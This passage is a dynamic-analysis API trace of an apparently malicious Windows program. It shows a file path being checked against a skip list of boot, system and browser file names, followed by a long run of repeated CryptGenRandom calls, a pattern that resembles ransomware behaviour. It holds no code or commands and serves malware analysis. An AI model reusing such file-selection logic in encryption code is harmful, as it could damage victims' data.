(pszFile="Notebook.jpg", pszSpec="*Realtek*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*bootmgr*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*boot*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*boot*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*IO.SYS*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*ntldr*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*chrome*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*opera*") returned 0 [0164.141] PathMatchSpecW (pszFile="Notebook.jpg", pszSpec="*firefox*") returned 0 [0164.141] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Notebook.jpg", pszSpec="*") returned 1 [0164.141] strlen (_Str="NMoreira") returned 0x8 [0164.141] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.141] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.141] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.141] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.141] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.141] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.141] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.142] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.143] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.144] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.145] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 